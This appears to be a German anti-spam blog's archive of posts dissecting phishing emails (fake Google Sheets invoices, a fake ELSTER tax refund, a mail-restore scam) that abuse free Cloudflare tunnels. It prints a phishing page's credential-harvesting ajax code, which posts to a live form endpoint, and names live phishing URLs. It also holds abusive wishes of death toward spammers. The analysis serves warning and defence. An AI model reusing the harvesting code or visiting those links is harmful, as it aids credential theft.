Schlagwortarchiv „CloudFlare“

Spreadsheet shared with you… Invoice

Donnerstag, 9. Oktober 2025

Häh? 🤔️

Von: Google Sheets <cassie@lifangvision.com>

Dies ist einer der wenigen Fälle, in denen sogar eine GMail-Adresse als Absender irgendwie glaubwürdiger gewesen wäre. Natürlich verwendet Google stets Mailadressen aus den eigenen Domains. 😁️

account@tamagothi.de shared a spreadsheet

Diese Mailadresse existiert nicht in der Domain tamagothi.de. Die Mailadressen dort richte ich immer noch selbst ein.
Die Domain tamagothi.de wird nicht von Google verwaltet.
Wenn man mir eine Datei zumailen will, kann man sie einfach an die E-Mail anhängen, so wie das seit ungefähr den Achtziger Jahren [!] möglich ist und in den Neunziger Jahren standardisiert und auch immer gern genutzt wurde, weil das nun einmal die direkteste und einfachste Methode ist. Irgendwelche komplizierten Umwege mit Filehostern und Links in einer Mail sind nur erforderlich, wenn die Datei sehr groß ist. Ab der Größenordnung MiB sollte man besser davon absehen, daraus einen Mailanhang zu machen. Rechnungen, Briefe und sogar wissenschaftliche Fachartikel (mit allem Gedöns an eingebetteten Grafiken und schönem Satz in guter Schriftart) sind kleiner, hochauflösende Fotos meist größer.

tamagothi.de (account@tamagothi.de) added you as an editor. Verify your email to securely make edits to this spreadsheet. You will need to verify your email every 7 days. Learn more

Dubai Invoice 10/9/2025 6:19:41 AM

Open

Der Link führt natürlich auch nicht zu Google, sondern in eine Domain, die über das zurzeit von Spammern meistmissbrauchte kostenlose Angebot von Cloudflare läuft. An die URI ist noch einmal die Mailadresse angehängt, damit die Spammer auch wissen, unter welchen Mailadressen die Spam ankommt, gelesen wird und sogar beklickt wird, denn das sind gute Opfer für jede denkbare kriminelle Machenschaft. Dort gibt es ein lustiges HTML-Dokument…

$ curl -s "https://safer-guests-advisory-flat.trycloudflare.com/?#leck@meinen.arsch" >dubai-invoice
$ file dubai-invoice 
dubai-invoice: HTML document, ASCII text
$ mv dubai-invoice dubai-invoice.html
$ lynx -dump dubai-invoice.html 
   Your session has expired, please sign in to continue.
   ____________________
   Please enter a valid email address.
   ____________________
   Please enter your password.
   (BUTTON) Sign In
$ _

…in welchem man seine Mailadresse (wird in Javascript mit der angegebenen Mailadresse vorbelegt) und sein Passwort eingeben und an Kriminelle senden kann. Natürlich haben die Kriminellen hierfür auch ein kostenloses Angebot eines Unternehmens verwendet, in diesem Fall ist es Formspark:

$ sed -n 134,147p dubai-invoice.html
            $.ajax({
                url:'https://submit-form.com/61dmNNQ8B',
                method: 'POST',
                data: {
                    chat_id: chatId,
                    text: message
                },
                success: function(response) {
                    window.location.href = `https://${domain}`;
                },
                error: function(error) {
                    $('#errorMessage').text('Error in submitting form!').show();
                }
            });
$ _

Ich bin übrigens erstaunt, dass dieser Phisher nicht einmal versucht hat, die Zieldomain im Quelltext in kryptischem Coding zu verbergen. Vermutlich ist der Honk, dessen geistiges Herausgefordertsein auch im Text der Spam durchschimmerte, mit solchen Dingen ein bisschen überfordert. Oder er fühlt sich sehr sicher, weil er in einem Staat lebt, in dem nicht so viel Wert auf Ermittlungen in Sachen Computerkriminalität gelegt wird oder in dem Verwaltung, Justiz und Polizeien durch und durch korrupt sind. Besonders sorglos waren früher stets die Phisher und Betrüger aus Nigeria, Russland und der Ukraine, später kam auch das bettelarme Benin hinzu.

Warum der Phisher dann nicht einfach ein HTML-Formular mit POST-Methode und Angabe der Adresse als action-Parameter im FORM-Tag macht? Vermutlich weiß der spammende Idiot gar nicht mehr, dass man so etwas auch in HTML machen kann, und zwar einfacher, kürzer, barrierefreier und klarer. So, wie etwa hier auf Unser täglich Spam das Kommentarformular, weil ich so viel Funktion wie möglich auch für Leser haben möchte, die Wert auf Computersicherheit und Privatsphäre legen (oder legen müssen) und deshalb einen Skriptblocker benutzen – Javascript verwende ich in einer Website extrem ungern und nur für Funktionen, die hübsch sind, aber nicht unbedingt sein müssen. 🤭️

Oder aber der spammende Idiot hat sich seine Phishingseite bei einem angelernten neuronalen Netzwerk – von Politikern, Journalisten und anderen digitalen Analphabeten durchgehend mit dem Reklamewort „künstliche Intelligenz“ bezeichnet, damit wir auch alle weniger Deutsch und mehr Reklame sprechen und denken – erpromptet. Denn wenn sich ein Spammer Mühe geben wollte, brauchte er ja auch nicht zu spammen, sondern könnte gleich arbeiten gehen. Dabei kommt auch ziemlich oft Code aus Lehrbüchern wieder raus, der vom Autor nur didaktisch-illustrativ gemeint war, den aber in der Praxis kein denkender Mensch so schreiben würde, wenn es auch eine ganze Größenordnung weniger komplex geht. Diese angelernten neuronalen Netzwerke haben zwar das Wissen der Welt beim Training mit dem Nürnberger Trichter verabreicht bekommen, aber sie verstehen davon nichts. Gut, dass ich bald tot bin. Nicht, dass mich noch jemand mit neuerdings wieder modernwerdenden Zwangsarbeitsgesetzen dazu heranzieht, den ganzen durch Vibe Coding entstandenen Müll zu entfehlern, zu erweitern oder zu verbessern! Ich habe ehrlich gesagt ein Vierteljahrhundert später immer noch genug vom Jahr-2000-Bug… und da habe ich viel Code von Menschen gelesen, deren Gedanken und Gedankenlosigkeiten noch halbwegs nachvollziehbar formuliert waren, und nicht das stochastisch generierte Geschwall aus angelernten neuronalen Netzwerken. Den Nach-mir-Kommenden wünsche ich viel Glück, sie werden es brauchen! 🫤️

Use is subject to the Google Privacy Policy.

Ganz sicher nicht. 🤥️

Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA

Mein Exemplar dieser Spam wurde über eine IP-Adresse aus dem großen, weiten Russland versendet und hat auf ihrem gesamten Transportweg niemals die USA gesehen.

You have received this email because account@tamagothi.de shared a spreadsheet with you from Google Sheets. Delete visitor session

Dass das eine Lüge ist, sollte jetzt hoffentlich klar genug geworden sein.

Google Workspace

Google, von mir so viel geschmäht, hat damit mal überhaupt nichts zu tun. An keiner Stelle.

Nicht reinklicken, einfach löschen! 🗑️

Generell niemals in eine E-Mail klicken!

SSB Automatic Invoice

Samstag, 20. September 2025

Ja, ich merke es schon: Das ist eine sehr „automatische“ Rechnung. Sie kommt auch völlig grundlos bei mir an.

Logo

Ich habe auch ein Logo.

Dear nachtwaechter,

Immerhin besser als „Guten Tag“, aber trotzdem nicht der richtige Name. Gar nicht auszudenken, wie das klingt, wenn jemand „schnupsimaus69 at irgendwas“ heißt. 😁️

This is a billing notice that your invoice INV–2147483648 generated on nachtwaechter is now overdue.

Oh, toll: Mit Nummer. Muss wichtig sein, sonst hätte es ja keine Nummer. Hier, Spammer, wenn euch die Nummern mal ausgehen sollten, ich habe noch ein paar für euch:

$ dd if=/dev/urandom bs=64 count=1 | od -l | sed 's/^[0-9]*[ -]*//' | tr – ' '
1+0 Datensätze ein
1+0 Datensätze aus
64 Bytes kopiert, 2,8494e-05 s, 2,2 MB/s
9104019511127040432  3556446584735863681
6517096418393505982  8953164502467161676
3433427370092636688  7981156417554269279
8046936970601088068  8050893807030589722
$ _

So können eure Spams immer so richtig irre wichtig aussehen. Da vergisst man sogar die mögliche Anrede als Schnupsimaus 69, wenn man so wichtige Nummern sieht. 😁️

Pay now to avoid service cancellation.

Invoice: INV–2147483648

Due Date: 9/19/2025 6:28:32 AM

Oh, wie geil. Eine sekundengenaue Fristsetzung hatte ich auch noch nie. Darüber übersehe ich sogar, dass das US-amerikanische Datumsformat für gestern – die Mail ist übrigens heute angekommen – hier ein kleines bisschen unüblich ist. Aber wofür bezahle ich da eigentlich, und welche Dienstleistung wird storniert? Ich weiß ja nicht einmal, wer mir hier angeblich schreibt. Moment, ich schaue mal in den HTML-Quelltext, da sollte ja oben noch ein Logo nachgeladen werden, das schafft bestimmt Klarheit:

<img style="padding: 20px; max-width: 64px;" alt=" Logo" src="https://www.google.com/s2/favicons?sz=64&amp;domain=tamagothi.de" width="64" height="64">

Oh krass, das ist das Piktogramm meiner eigenen Homepage! Gut, dass Google immer so vielfältig nutzbar ist und dass Google jeder Missbrauch durch Kriminelle seit mindestens anderthalb Jahrzehnten völlig wumpe ist. Zuverlässigkeit und vielseitige persönliche Nutzbarkeit ist eben das Wichtigste im gegenseitigen Umgang zwischen asozialen Unternehmen wie Google und Trickbetrügern. 😅️

(Ja, werter Mitmensch Jurist, ich habe „asozial“ geschrieben. Es ist meine Bezeichnung für Geschäftsmodelle, die darauf basieren, dass ein börsennotiertes Unternehmen Reibach mit kostenlosen Dienstleistungen macht, aber die anfallenden Aufwände und Kosten durch den Missbrauch dieser Dienstleistungen der gesamten restlichen Menschheit aufbürdet. Google ist selbst Spam. Verantwortungslos und geradezu kriminell geschäftstüchtig. Schon sehr, sehr lange. Google stinkt.)

Wer eine sicher konfigurierte Mailsoftware verwendet, die nicht einfach Bilder aus dem Web nachlädt, kann nicht so leicht mit billigen Tricks in die Irre geführt werden. Wer aber seine technische Bildung aus „Mein Auto spricht zu mir“ Knight Rider bezogen hat, wird von „meine Website mailt mich an“ auch nicht weiter überrascht sein. 😆️

You can log in to your client area to view and pay the invoice at:
https://www.tamagothi.de/viewinvoice.php?id=INV–2147483648

Natürlich ist der Link irreführend. Er geht nicht in die Domain tamagothi.de, das ist nur der Linktext. In Wirklichkeit geht es in eine Subdomain von trycloudflare.com Das kostet den Phisher ja auch nichts. Dort bekommt man die Möglichkeit…

Your session has expired, please sign in to continue

…etwas sehr dummes zu tun und auf einer ansonsten völlig nackten Webseite ohne Impressum sein Passwort einzugeben. Dieses geht direkt an Kriminelle. Mit einem Zugriff auf die E-Mail kann man bei den meisten Menschen schon viel anfangen. Man kann Konten bei Amazon oder eBay übernehmen und für Betrugsgeschäfte unter fremder Identität nutzen, man kann aber auch personalisierte Betrugsnummern machen – nicht vergessen: der gesamte bisherige Mailverkehr steht den Betrügern zur Verfügung, und der gibt tiefe Einblicke – und Freunde, Bekannte, Verwandte anschreiben, eine Notlage vorspielen und um Geld bitten, am besten über Western Union, das geht ja am schnellsten.

Wenn man sich angemeldet hat, gibt es eine plumpe Fehlermeldung. Die Daten sind aber schon bei den Trickbetrügern. Um die Daten zu erhalten, verwenden sie die Dienstleistung von Formspark, wo man sich unter Angabe seiner Mailadresse ebenfalls einen kostenlosen Account einrichten kann.

Thank you for using our services,
Visit our website | Log in to your account | Get support

Copyright © All rights reserved.

Vielen Dank, dass ihr Spammer mir so gern den Arsch sauberleckt! 👍️
Klick mal hier | Klick mal dort | Hauptsache, du klickst, denn alle Links führen auf die gleiche Phishing-Seite

Entf! 🚽️

ATTTENTION! : Retrieve Pending Undelivered Emails To Your Inbox

Freitag, 19. September 2025

Abt.: Gib mir grundlos dein Mailpasswort!

Von: Restoredesk.tamagothi.de <Info@mail.nstc.in>

Ja nee, ist klar! Die Domain tamagothi.de wird also von irgendeiner obskuren Institution mit der Domain nstc.in verwaltet. Das wüsste ich aber! Viele Grüße nach Indien. 🤭️

Postmaster tamagothi.de Recipient: planning

We‘re reaching out to let you know that we were unable to deliver some message(s) to your email address due to security restrictions on your mail server.

It appears that your system settings is currently blocking incoming messages.

Account Information:

Email Address: nac███████ter@tamagothi.de

Status: Held

Allow Message Review Message
© 2025. All Rights Reserved.

Mit proklamiertem geistigen Eigentum der tollen Klitsche „Alle Rechte vorbehalten“. Oder firmiert das Unternehmen vielleicht als 2025? Das wäre doch eine tolle Zahl, die man auf elf verschiedene Weisen als Summe dreier Quadratzahlen schreiben kann und in deren Primfaktorzerlegung nur die Primzahlen 3 und 5 vorkommen. Die Links gehen übrigens in eine Subdomain von trycloudflare.com. Kostet die Phisher ja nix.

Cloudflare hat den kriminellen Müll schon entfernt. Danke! Es wird ein vermutlich ein ganz ordinäres Phishing auf Mailpasswörter gewesen sein. Verbrecher treten ja viel lieber unter anderer Identität auf, wenn sie ihre Verbrechen begehen, denn sie tragen nicht so gern Handschelle.

(Wenn man mir eine Mail nicht angenommen wird, hat das übrigens immer einen Grund. Die meisten dieser Gründe konfiguriere ich von Hand. Wer mich über Mail erreichen möchte, sollte vielleicht nicht spammen.)

Verifizierung Ihres Kontos für die Einkommensteuer-Rückzahlung erforderlich

Dienstag, 1. Juli 2025

Von: ELSTERIhr Online-Finanzamt <noreply@elster.de>

Da hat sich der Spammer gesagt: „Schreibe ich doch mal einen überzeugend aussehenden Absender rein“. Zu schade, dass SPF dafür sorgt, dass die Spam dann garantiert als Spam aussortiert wird, wenn er sie über die IP-Adresse eines US-amerikanischen Hostingdienstleisters (Abuse-Mail ist schon draußen) versendet. Aber man kann ja auch nicht jeden Tag Glück beim Denken haben.

Bescheide des Finanzamtes kommen natürlich immer mit der Sackpost und niemals in einer unverschlüsselten und nicht digital signierten E-Mail. Allein schon wegen des gesetzlich vorgeschriebenen Datenschutzes und wegen des Steuergeheimnisses.

ELSTER

Das steht schon im Absender.

Eine Mitteilung der Bundesbehörde.

Die Finanzämter sind in der Bundesrepublik Deutschland aber Landesbehörden.

Sehr geehrter Kunde,

Genau mein Name!

Na, fühlt ihr euch beim Finanzamt auch immer wie Kunden? Und nicht wie… ähm… störende Bittsteller vor einer kalten und oft etwas dummen Maschinerie zum Eintreiben des Geldes, das dann in die alldurchwaltende Korruption der BRD fließt?

Um die Rückzahlung Der Einkommensteuer zu erhalten, müssen Sie Ihr Konto verifizieren, damit wir den vollen Betrag auf das richtige Konto überweisen können.

Wie hoch ist er denn, der volle Betrag? Und wo ist der zugehörige Bescheid? Wann wurde er mir zugestellt? Und für welche Steuernummer ist er?

Kein Finanzamt in der BRD würde so einen Text schreiben wie dieser Spammer. Man kann viel schlechtes über die Verwaltung in der BRD sagen, aber ihre Kommunikation ist niemals so nebulös.

Zum Dokument

Wer da klickt, lasse alle Hoffnung fahren!

$ lynx -source "https://scanned.page/68626f761e1b4"
<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.png"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#ffffff"/><link rel="apple-touch-icon" href="/favicon.png"/><link rel="manifest" href="/manifest.json"/><title></title><script>const manifestElement=document.querySelector('[rel="manifest"]'),icon=document.querySelector('[rel="icon"]'),appleIcon=document.querySelector('[rel="apple-touch-icon"]');var domain="sp";const setAttributes=(e,t,n)=>{manifestElement&&manifestElement.setAttribute("href",e),icon&&icon.setAttribute("href",t),appleIcon&&appleIcon.setAttribute("href",n)};"sp"===domain?setAttributes("/manifest.json","/favicon.png","/favicon.png"):"qcc"===domain&&setAttributes("/qci/manifest.json","/qci/favicon.png","/qci/favicon.png")</script><script defer="defer" src="/static/js/main.ed55047f.js"></script><link href="/static/css/main.c6e9a545.css" rel="stylesheet"><script data-cfasync="false" nonce="db15d7e8-bd05-415b-ab5d-725e7b914243">try{(function(w,d){!function(fv,fw,fx,fy){if(fv.zaraz)console.error("zaraz is loaded twice");else{fv[fx]=fv[fx]||{};fv[fx].executed=[];fv.zaraz={deferred:[],listeners:[]};fv.zaraz._v="5858";fv.zaraz._n="db15d7e8-bd05-415b-ab5d-725e7b914243";fv.zaraz.q=[];fv.zaraz._f=function(fz){return async function(){var fA=Array.prototype.slice.call(arguments);fv.zaraz.q.push({m:fz,a:fA})}};for(const fB of["track","set","debug"])fv.zaraz[fB]=fv.zaraz._f(fB);fv.zaraz.init=()=>{var fC=fw.getElementsByTagName(fy)[0],fD=fw.createElement(fy),fE=fw.getElementsByTagName("title")[0];fE&&(fv[fx].t=fw.getElementsByTagName("title")[0].text);fv[fx].x=Math.random();fv[fx].w=fv.screen.width;fv[fx].h=fv.screen.height;fv[fx].j=fv.innerHeight;fv[fx].e=fv.innerWidth;fv[fx].l=fv.location.href;fv[fx].r=fw.referrer;fv[fx].k=fv.screen.colorDepth;fv[fx].n=fw.characterSet;fv[fx].o=(new Date).getTimezoneOffset();if(fv.dataLayer)for(const fF of Object.entries(Object.entries(dataLayer).reduce(((fG,fH)=>({…fG[1],…fH[1]})),{})))zaraz.set(fF[0],fF[1],{scope:"page"});fv[fx].q=[];for(;fv.zaraz.q.length;){const fI=fv.zaraz.q.shift();fv[fx].q.push(fI)}fD.defer=!0;for(const fJ of[localStorage,sessionStorage])Object.keys(fJ||{}).filter((fL=>fL.startsWith("_zaraz_"))).forEach((fK=>{try{fv[fx]["z_"+fK.slice(7)]=JSON.parse(fJ.getItem(fK))}catch{fv[fx]["z_"+fK.slice(7)]=fJ.getItem(fK)}}));fD.referrerPolicy="origin";fD.src="/cdn-cgi/zaraz/s.js?z="+btoa(encodeURIComponent(JSON.stringify(fv[fx])));fC.parentNode.insertBefore(fD,fC)};["complete","interactive"].includes(fw.readyState)?zaraz.init():fv.addEventListener("DOMContentLoaded",zaraz.init)}}(w,d,"zarazData","script");window.zaraz._p=async eC=>new Promise((eD=>{if(eC){eC.e&&eC.e.forEach((eE=>{try{const eF=d.querySelector("script[nonce]"),eG=eF?.nonce||eF?.getAttribute("nonce"),eH=d.createElement("script");eG&&(eH.nonce=eG);eH.innerHTML=eE;eH.onload=()=>{d.head.removeChild(eH)};d.head.appendChild(eH)}catch(eI){console.error(`Error executing script: ${eE}\n`,eI)}}));Promise.allSettled((eC.f||[]).map((eJ=>fetch(eJ[0],eJ[1]))))}eD()}));zaraz._p({"e":["(function(w,d){})(window,document)"]});})(window,document)}catch(e){throw fetch("/cdn-cgi/zaraz/t"),e;};</script></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"></div><script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId":"95853aef1e74bbcc","serverTiming":{"name":{"cfExtPri":true,"cfEdge":true,"cfOrigin":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}},"version":"2025.6.2","token":"105c7571b60743aba1e456971e3636d0"}' crossorigin="anonymous"></script>
</body></html>
$ _

Ich habe gerade keine Lust, mich bei übertrieben sommerlichen Außentemperaturen länger als eine Viertelstunde durch diesen Wust durchzuhangeln und wünsche allen Menschen, die vor lauter Vorfreude aufs Geld in eine recht dumm formulierte Spam geklickt haben, viel Glück. Sie werden es brauchen. Bei dem teilweise sehr verwurschtelten Javascript, das dann nach dieser schon sehr kryptischen Weiterleitung der Geschmacksrichtung „Cloudflare“ folgt, würde ich es niemals ausschließen, dass es auch eine „kostenlose Sicherheitsprüfung“ des Computers und der darauf installierten Software gibt, inklusive Installation einer so aktuellen Kollektion von Schadsoftware, dass auch ein so genanntes „Antivirusprogramm“ machtlos ist. Alles, was man dafür braucht, kann sich jeder aufgeweckte Elfjährige in den dunklen Ecken des Internet gegen Gewinnbeteiligung as a service besorgen. Ja, es gibt kriminelle Dienstleister für Trickbetrug und Schadsoftware, die im Hintergrund bleiben, sich mit einem Anteil begnügen und andere die deutlich gefährlichere Drecksarbeit machen lassen. Deshalb klickt man ja auch nicht in eine Mail! Denn nicht in Mail zu klicken schützt vor Phishing, einer der ältesten und immer noch häufigsten Trickbetrugsmaschen im Internet. Und es schützt vor Schadsoftware, die mit vergleichbaren psychischen Hebeln transportiert wird. Nicht in E-Mail zu klicken ist eine wichtige „Cyberabwehr“, die funktioniert. Der Adblocker im Webbrowser ist doch hoffentlich längst eine Selbstverständlichkeit, oder? Der funktioniert nämlich auch sehr gut.

Ich klicke übrigens auch nicht in E-Mail, außer, mir ist völlig klar, wer der Absender ist und dass dieser Absender vertrauenswürdig ist. In den meisten Fällen, wo jemand nicht gerade einen sehr markanten und unverwechselbaren Stil beim Schreiben hat, heißt das: Ich prüfe digitale Signaturen. Und wenn da keine sind, was auch im Jahr 2025 immer noch der Standard ist, dann fasse ich Links aus einer Mail nur mit der Kneifzange an, statt sie direkt zu öffnen. Oder ich rufe kurz an, ob die Mail echt ist…

Warum ich von Elfjährigen spreche? Weil ein erfahrener Betrüger, dessen Gehirn gerade nicht im Stromsparmodus läuft, niemals versucht hätte, eine falsche Absenderadresse in einer Domain…

$ host -t TXT elster.de
elster.de descriptive text "v=spf1 mx include:_spf.blk1.elster.de include:_spf.blk2.elster.de include:_spf.blk3.elster.de include:_spf.blk4.elster.de include:_spf.blk5.elster.de include:_spf.blk6.elster.de include:_spf.blso.elster.de ~all"
elster.de descriptive text "MS=7B184F7133FA6F4419018914042F2C9A28CF6472"
$ _

…mit SPF anzugeben. Das kommt nicht einmal durch die primitivsten Spamfilter dieser Welt hindurch. Und deshalb macht das auch kein erfahrener Krimineller. Die leben ja davon, dass ihr gefährlicher und/oder betrügerischer Müll überhaupt oft genug ankommt, damit sich die Naiven und sorglos Überrumpelbaren finden, die immer noch darauf reinfallen.

ELSTER ®

Nein, diese diebische Elster hat damit nichts zu tun. Hier schreiben richtige Verbrecher. 😉️

Advertise on spam.tamagothi.de

Mittwoch, 23. April 2025

Oh, das hatte ich ja lange nicht. Nein, Unser täglich Spam ist keine Litfasssäule. Und schon gar nicht für Spammer.

Von: Lemonet <leo@lemonetorders.com>

Oh, im Moment hat die lustige Domain aus der Mailadresse…

$ host lemonetorders.com
lemonetorders.com mail is handled by 38 route2.mx.cloudflare.net.
lemonetorders.com mail is handled by 59 route1.mx.cloudflare.net.
lemonetorders.com mail is handled by 43 route3.mx.cloudflare.net.
$ _

…nicht einmal eine IP-Adresse, sondern ist eher so ein Wegweiser in das Nichts. Man kann sie nur anmailen, mit schön über Cloudflare verschleiertem Ziel. Hier schreibt eines dieser Unternehmen, das zwar angeblich seine Geschäfte mit Reklame im Internet macht, aber im Jahr 2025 immer noch nicht so eine neumodische Website betreibt. Die werben für sich selbst nur mit solcher Spam.

Hello,

Genau mein Name. Den hast du bestimmt im Impressum gefunden, meinen Namen „Hallo“, oder?

I have a client who’s interested in advertising on spam.tamagothi.de. Could you let me know the right person to speak with about this?

Hey, Spammer!

Du hast nichts selbst, nicht einmal eine Website, deine Klitsche hat keine Firmierung, dein „Kunde“ hat keinen Namen und keine Firmierung, aber will trotzdem hier Reklame machen, ohne mir gleich von Anfang an zu sagen, wofür er überhaupt Reklame machen will – das ist für mich, der ich im Lande der Linkhaftung eine Website betreibe und darüber hinaus aus Anstandsgründen nicht meine wenigen Leser zu Betrügern und Abzockern stupsen will, nämlich das Wichtigste. Natürlich weiß ich trotzdem, was das für eine Reklame ist, die du mir reindrücken möchtest, und zwar wegen deiner Spam: Es ist Reklame für Datingbetrug, Abzockcasinos, Reichwerdexperten, Quacksalberei oder kriminelle Websites mit Schadsoftwafe. Spam ist niemals ein gutes Zeichen. Und ich kann dir auch sagen, wer der richtige Mensch ist, mit dem du mal darüber sprechen solltest: Der nächste Polizeibeamte im Rahmen eines umfassenden Geständnisses, weil du doch noch etwas in dir fühlst und den Ekel vor dir selbst einfach nicht mehr erträgst. Möge es schnell zu so einem Gespräch kommen, und möge es erfolgreich sein. Für die Fahnder bei der Polizei.

We’re working on a tight schedule, so a quick reply would be really appreciated 🙂

Ich habe nur eine begrenzte Lebenszeit, und es gibt verbrecherische Idioten wie dich, die mir immer wieder ein bisschen davon wegnehmen. Dein zügiges Ableben würde ich deshalb sehr begrüßen.

Best,
Leo Cello,
Head of Partnerships & Outreach @ Lemonet

Wenn du der „Kopf der Öffentlichkeitsarbeit“ bist, dann möchte ich den Arsch nicht mehr sehen.

Mit Winkewinke!

Dein dich „genießender“
Nachtwaechter

sex

Mittwoch, 21. August 2024

So nannte sich der Kommentator mit seiner gespooften IP-Adresse (ihm doch egal, ob da etwas zurückkommt, hauptsache seine Spam ist draußen) und seinem schlecht programmierten, fehlerhaften Spamskript, der heute morgen um 7:53 Uhr die Leser von Unser täglich Spam mit dem folgenden Kommentar beglücken wollte:

Thank you very much for sharing, I learned a lot from your article. Very cool. Thanks.

Da frage ich mich nur noch, was wohl die tolle, mit dem Wort „sex“ verlinkte „Homepage“ dieses freundlich lobenden Kommentators mitzuteilen hat:

$ surbl jieve.cn
jieve.cn	okay
$ mime-header https://jieve.cn/misionaris-782/
HTTP/1.1 403 Forbidden
Date: Wed, 21 Aug 2024 07:26:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Wed, 21 Aug 2024 07:26:18 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmxZq5Uu2G5%2FTSs8mPPSHXH9BCjLKKOPWfG8sDh%2FxU8gLcua87rp7kfnOK6t0khUrm3YVb1dvOpwXozMs7nEYA75f7hnILskYO%2BJ4S%2BeqKrdrSJfItDheuiKYg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b68e48a39387a3d-DUS
alt-svc: h3=":443"; ma=86400
$ _

Nun, ich interpretiere das mal als „Sex ist von Cloudflare verboten worden“. 🤣️

Das muss man auch erstmal schaffen als Spammer, dass die spamverlinkte Website schon nach weniger als zwei Stunden nicht mehr erreichbar ist.

Neue Nachricht erhalten

Donnerstag, 12. Februar 2015

Stimmt, ich habe eine Spam im Posteingang.

Hallo,

Du hast eine neue Nachricht erhalten von: „Mira_87″

Profil von „Mira_87″:
http://www.deine-nachricht.com/[ID gelöscht]/Mira_87

Nachricht abrufen:
http://www.deine-nachricht.com/[ID gelöscht]/

Der User hat gesucht nach: nachtwaechter (at) tamagothi (punkt) de

Seid lieb zueinander!

Viele Grüße,

Marie
Nachrichtenzentrale
… der besten kostenlosen Message-Community

So so, Dating-Spammer,

diese, dieser oder dieses angebliche(r) Mira_87 hat mir also eine Nachricht zugestellt, weil er, sie oder es zwar nicht meinen Namen kannte, aber meine Mailadresse – dies aber nicht, indem er, sie oder es mir einfach eine Mail schickt, sondern stattdessen meine Mailadresse irgendwo auf einer komischen Site eingegeben. Und deshalb bekomme ich eine Mail, in die ich reinklicken muss, um lesen zu können, was mir gemailt wurde, weil sie angeblich von der besten kostenlosen Message-Community kommt, statt direkt gemailt zu werden. Ich verstehe. Es handelt sich um eine typische Spam für knalle Dummköpfe, die erst auf alles klicken, was sich anklicken lässt und dann denken. Die funken dann als erstes zu dir zurück, dass deine Spam angekommen ist und beklickt wurde. Und außerdem sehen sie nach der Weiterleitung von deiner aktuellen Wegwerfdomain eine ganz tolle Dating-Betrugs-Site in der Domain whatssexy (punkt) net, wo sie vor lauter Möpsen und Mösen ganz vergessen, um was es eigentlich geht und erstmal – mit dem Blut im Schwellkörper, das im Hirne fehlt – einen richtigen Datenstriptease vor dir hinlegen, allein schon ausreichend für einen kriminellen Identitätsmissbrauch.

Na ja, wenigstens gibts im Moment anstelle der aus dem Internet zusammengeklaubten pr0n-Fotos eine wenig erregende Fehlermeldung von CloudFlare. Von der kann ich sogar einen Screenshot machen, ohne, dass ich hinterher die ganzen niemals von dir gefragten Frauen – es gibt ja bei dir immer nur Frauen – wenigstens ein bisschen unkenntlich machen muss. (So wie in diesem Screenshot sieht das aus, wenns mal nicht ganz so viele primäre und sekundäre Geschlechtsmerkmale gibt.) Im „Web of Trust“ stimmt die Reputation auch! Dafür hast du aber auch schon jahrelang hart an deiner Menschenverachtung gearbeitet.

Und solltest du, Dating-Spammer mit deinen gleichermaßen hirn- wie einfallslosen Spams es tatsächlich geschafft haben, dass sogar CloudFlare deine betrügerischen Dreckssites sperrt, dann erfüllte mich das mit ganz besonderer Freude. Du wärest nämlich der erste Spammer, der mir im Postfach begegnet ist und das „hinbekommen“ hat.

Geh einfach sterben!

Dein dich „genießender“
Nachtwächter